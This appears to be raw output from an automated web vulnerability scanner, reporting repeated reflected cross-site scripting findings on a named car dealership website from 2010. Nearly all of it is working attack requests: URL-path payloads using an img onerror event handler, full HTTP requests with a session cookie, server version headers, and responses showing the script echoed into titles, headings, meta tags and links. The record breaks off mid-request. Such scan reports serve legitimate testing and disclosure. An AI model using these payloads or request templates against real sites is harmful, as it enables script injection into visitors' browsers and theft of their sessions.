This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Matrix7704d'><img%20src%3da%20onerror%3dalert(1)>98ea0fa9a06/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:51:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:51:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Matrix7704d'
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=Matrix7704d'><img src=a onerror=alert(1)>98ea0fa9a06'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e344'><img%20src%3da%20onerror%3dalert(1)>00dcdd3f07b was submitted in the REST URL parameter 2. This input was echoed as 4e344'><img src=a onerror=alert(1)>00dcdd3f07b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius4e344'><img%20src%3da%20onerror%3dalert(1)>00dcdd3f07b/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:37:32 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:33 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:37:33 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Prius4e344'>
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=Prius4e344'><img src=a onerror=alert(1)>00dcdd3f07b'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88a0e<img%20src%3da%20onerror%3dalert(1)>184fc2908bb was submitted in the REST URL parameter 2. This input was echoed as 88a0e<img src=a onerror=alert(1)>184fc2908bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius88a0e<img%20src%3da%20onerror%3dalert(1)>184fc2908bb/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:01 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:01 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:02 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Prius88a0e<i
...[SNIP]...
<H1> Toyota Prius88a0e<img src=a onerror=alert(1)>184fc2908bb</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d1b"><img%20src%3da%20onerror%3dalert(1)>b355657318b was submitted in the REST URL parameter 2. This input was echoed as 16d1b"><img src=a onerror=alert(1)>b355657318b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius16d1b"><img%20src%3da%20onerror%3dalert(1)>b355657318b/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:29:38 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:29:39 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:29:39 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Prius16d1b">
...[SNIP]...
<META NAME=DESCRIPTION CONTENT=" Toyota Prius16d1b"><img src=a onerror=alert(1)>b355657318b at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Prius16d1b">
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d1e8<img%20src%3da%20onerror%3dalert(1)>72247f1d2e1 was submitted in the REST URL parameter 2. This input was echoed as 5d1e8<img src=a onerror=alert(1)>72247f1d2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV45d1e8<img%20src%3da%20onerror%3dalert(1)>72247f1d2e1/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:57:53 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:57:53 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:57:54 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota RAV45d1e8<im
...[SNIP]...
<H1> Toyota RAV45d1e8<img src=a onerror=alert(1)>72247f1d2e1</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc342"><img%20src%3da%20onerror%3dalert(1)>4d10e890738 was submitted in the REST URL parameter 2. This input was echoed as fc342"><img src=a onerror=alert(1)>4d10e890738 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV4fc342"><img%20src%3da%20onerror%3dalert(1)>4d10e890738/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:54:39 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:39 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:54:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota RAV4fc342">< ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota RAV4fc342"><img src=a onerror=alert(1)>4d10e890738 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota RAV4fc342"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95961'><img%20src%3da%20onerror%3dalert(1)>4b18651e7d7 was submitted in the REST URL parameter 2. This input was echoed as 95961'><img src=a onerror=alert(1)>4b18651e7d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV495961'><img%20src%3da%20onerror%3dalert(1)>4b18651e7d7/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:56:06 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:06 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota RAV495961'>< ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=RAV495961'><img src=a onerror=alert(1)>4b18651e7d7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89457<img%20src%3da%20onerror%3dalert(1)>d4aabfa3f2a was submitted in the REST URL parameter 2. This input was echoed as 89457<img src=a onerror=alert(1)>d4aabfa3f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia89457<img%20src%3da%20onerror%3dalert(1)>d4aabfa3f2a/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:58:05 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:58:05 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:58:06 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia89457 ...[SNIP]... <H1> Toyota Sequoia89457<img src=a onerror=alert(1)>d4aabfa3f2a</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ab2"><img%20src%3da%20onerror%3dalert(1)>ce78bc2c7e5 was submitted in the REST URL parameter 2. This input was echoed as 68ab2"><img src=a onerror=alert(1)>ce78bc2c7e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia68ab2"><img%20src%3da%20onerror%3dalert(1)>ce78bc2c7e5/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:54:51 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:51 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:54:52 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia68ab2 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Sequoia68ab2"><img src=a onerror=alert(1)>ce78bc2c7e5 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Sequoia68ab2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 622d6'><img%20src%3da%20onerror%3dalert(1)>42209c848b8 was submitted in the REST URL parameter 2. This input was echoed as 622d6'><img src=a onerror=alert(1)>42209c848b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia622d6'><img%20src%3da%20onerror%3dalert(1)>42209c848b8/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:56:26 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:27 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:56:27 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia622d6 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Sequoia622d6'><img src=a onerror=alert(1)>42209c848b8'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a3c"><img%20src%3da%20onerror%3dalert(1)>cfaad35fdec was submitted in the REST URL parameter 2. This input was echoed as 28a3c"><img src=a onerror=alert(1)>cfaad35fdec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna28a3c"><img%20src%3da%20onerror%3dalert(1)>cfaad35fdec/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:41:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:41:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:41:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna28a3c" ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Sienna28a3c"><img src=a onerror=alert(1)>cfaad35fdec at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Sienna28a3c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2618e<img%20src%3da%20onerror%3dalert(1)>9bccc83d676 was submitted in the REST URL parameter 2. This input was echoed as 2618e<img src=a onerror=alert(1)>9bccc83d676 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna2618e<img%20src%3da%20onerror%3dalert(1)>9bccc83d676/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:46:42 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:46:42 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:46:43 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna2618e< ...[SNIP]... <H1> Toyota Sienna2618e<img src=a onerror=alert(1)>9bccc83d676</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24cfd'><img%20src%3da%20onerror%3dalert(1)>1643c9e0dd9 was submitted in the REST URL parameter 2. This input was echoed as 24cfd'><img src=a onerror=alert(1)>1643c9e0dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna24cfd'><img%20src%3da%20onerror%3dalert(1)>1643c9e0dd9/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:44:06 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:44:06 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:44:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna24cfd' ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Sienna24cfd'><img src=a onerror=alert(1)>1643c9e0dd9'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b91d<img%20src%3da%20onerror%3dalert(1)>900fb029992 was submitted in the REST URL parameter 2. This input was echoed as 2b91d<img src=a onerror=alert(1)>900fb029992 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x22b91d<img%20src%3da%20onerror%3dalert(1)>900fb029992/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:31:30 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:31:31 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:31:31 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x22b ...[SNIP]... <H1> Toyota Tacoma 4x22b91d<img src=a onerror=alert(1)>900fb029992</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16e5"><img%20src%3da%20onerror%3dalert(1)>13e7f5069df was submitted in the REST URL parameter 2. This input was echoed as e16e5"><img src=a onerror=alert(1)>13e7f5069df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x2e16e5"><img%20src%3da%20onerror%3dalert(1)>13e7f5069df/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
